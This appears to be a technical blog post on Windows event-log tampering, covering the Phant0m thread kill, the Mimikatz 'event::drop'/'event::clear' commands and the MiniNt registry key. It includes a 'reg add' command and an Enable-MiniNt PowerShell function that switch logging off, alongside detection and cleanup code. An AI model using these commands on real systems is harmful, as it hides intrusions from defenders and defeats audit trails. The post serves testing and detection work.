Event Log Tampering Part 1: Disrupting the EventLog Service

You Can’t See Me
  • Patching the Event Service (Mimikatz)
  • Downgrading Windows Components (Adding MiniNT key)
  • Event Record Unreferencing (Shadow Brokers Tools DanderSpritz/eventlogedit)
  • Rewriting Logs with WinAPI EvtExportLog (3gstudent’s evolutions of eventlogedit)

Disrupting the EventLog Service

The goal of the methods covered below is to disrupt the service responsible for event logging so that no events get recorded. That either leaves a hole in the defender's timeline, or lets an attacker clear the event log without the clearing itself being recorded (the "log was cleared" record, event ID 1102 in the Security log and 104 in the System log, never appears because the service that would write it is not working).

Service Host Thread Tampering

Let's quickly have a look at how the EventLog service runs. EventLog is not a standalone executable: it is a service DLL (wevtsvc.dll) loaded into a shared svchost.exe instance alongside other services, so the first step is to find which svchost.exe process hosts it. Once that process is known, a tool such as Phant0m enumerates its threads, picks out the ones whose start address lies inside wevtsvc.dll, and terminates only those. The svchost.exe process and the other services it hosts keep running, and the Service Control Manager still reports EventLog as Running, yet nothing is written until the service is restarted.

A time gap in logs from where I started Phant0m and restarted the service.
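The following PowerShell is an added example, not code from the original post or from Phant0m. It locates the svchost.exe that hosts EventLog and then runs a logging heartbeat: it writes a marker event and checks that the service actually recorded it, which separates a live service from one whose worker threads have been killed (or whose code has been patched) while it still reports Running. It assumes an elevated PowerShell session; the source name `EventLogHeartbeat` and event ID 999 are arbitrary choices for the check, not identifiers from the post.

```powershell
# Added example (not from the original post or Phant0m): find the svchost.exe hosting
# EventLog and verify the service still records events. Run from an elevated session.

function Get-EventLogHost {
    # EventLog is a DLL service; Win32_Service reports the PID of the svchost.exe that loaded it
    $svc  = Get-CimInstance -ClassName Win32_Service -Filter "Name='EventLog'"
    $proc = Get-Process -Id $svc.ProcessId
    [PSCustomObject]@{
        State      = $svc.State
        PID        = $svc.ProcessId
        Image      = $proc.Path
        # wevtsvc.dll is the EventLog service DLL; its presence confirms this is the right svchost
        HasWevtsvc = [bool]($proc.Modules | Where-Object { $_.ModuleName -ieq 'wevtsvc.dll' })
        Threads    = $proc.Threads.Count
        # services sharing this svchost; they survive a thread kill aimed only at EventLog
        CoHosted   = (Get-CimInstance -ClassName Win32_Service -Filter "ProcessId=$($svc.ProcessId)").Name -join ','
    }
}

function Test-EventLogHeartbeat {
    # Writes a marker event and reads it back. A Running service whose threads were
    # terminated (or whose code was patched) silently drops it, so this returns $false.
    param([int]$TimeoutSeconds = 5)
    $source = 'EventLogHeartbeat'                 # hypothetical source name, registered by eventcreate
    $marker = [guid]::NewGuid().ToString()        # unique text so we match only our own event
    $null = & eventcreate.exe /ID 999 /L APPLICATION /T INFORMATION /SO $source /D $marker 2>&1
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    do {
        # If the service is unresponsive the query itself fails; treat that like a dropped event
        $hit = Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = $source; Id = 999 } `
                            -MaxEvents 5 -ErrorAction SilentlyContinue |
               Where-Object { $_.Message -like "*$marker*" }
        if ($hit) { return $true }
        Start-Sleep -Milliseconds 500
    } while ((Get-Date) -lt $deadline)
    return $false
}

Get-EventLogHost | Format-List
if (-not (Test-EventLogHeartbeat)) {
    Write-Warning 'EventLog reports Running but did not record a test event: suspect thread or service tampering.'
}
```

Note that the heartbeat depends on the same service it is testing: when the threads are gone, both the write and the read-back go through the dead service, so a timeout (rather than an explicit error) is the expected symptom, and restarting the service is what closes the gap seen in the figure above.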

Patching the Event Service

Mimikatz currently has an `event` module that can patch the EventLog service in memory so that it drops incoming events (`event::drop`, which requires `privilege::debug` first) and can then clear a log (`event::clear`). Because the service is patched before the clear, the usual "log was cleared" record is never written, which is the whole point of combining the two steps.

Downgrading Windows Components

The existence of the MiniNt registry key (HKLM\SYSTEM\CurrentControlSet\Control\MiniNt) makes various Windows components, the EventLog service among them, behave as though they are running in WinPE (Windows Preinstallation Environment), where event logging is not expected to be available. The key is read when the service starts, so the effect only appears after the EventLog service is restarted or the machine is rebooted, and it persists until the key is deleted. Two caveats: other components also react to the key, so only do this on a disposable test system, and the key creation itself is a registry write that can be caught by registry auditing or Sysmon (event ID 12) if those are in place.

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt"
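As an added example (not from the original post), the PowerShell below wraps the same key in three small functions: a defender-side check for the key, the attacker-side creation followed by the service restart the key needs to take effect, and the cleanup the post does not show. The function names are my own; it assumes an elevated session on a throwaway test VM.

```powershell
# Added example (not from the original post): detect, create and remove the MiniNt key.
# Run from an elevated PowerShell session on a disposable test machine.

$MiniNtPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\MiniNt'

function Test-MiniNt {
    # The key should never exist on a normal (non-WinPE) installation, so presence alone is a finding
    Test-Path -Path $MiniNtPath
}

function Enable-MiniNt {
    # Equivalent of: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniNt"
    New-Item -Path $MiniNtPath -Force | Out-Null
    # The service reads the key at startup, so nothing changes until it is restarted;
    # -Force also restarts the services that depend on EventLog
    Restart-Service -Name EventLog -Force
}

function Disable-MiniNt {
    # Cleanup: delete the key and restart the service so logging resumes
    Remove-Item -Path $MiniNtPath -Force -ErrorAction SilentlyContinue
    Restart-Service -Name EventLog -Force
}

# Usage on the test VM: Enable-MiniNt, reproduce the missing events, then Disable-MiniNt.
if (Test-MiniNt) {
    Write-Warning "MiniNt key present at $MiniNtPath; EventLog will stop recording after its next restart."
}
```

The check function is the part worth keeping: a scheduled `Test-MiniNt` on monitored hosts, or a registry audit rule on that path, catches the technique regardless of whether the service has been restarted yet.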
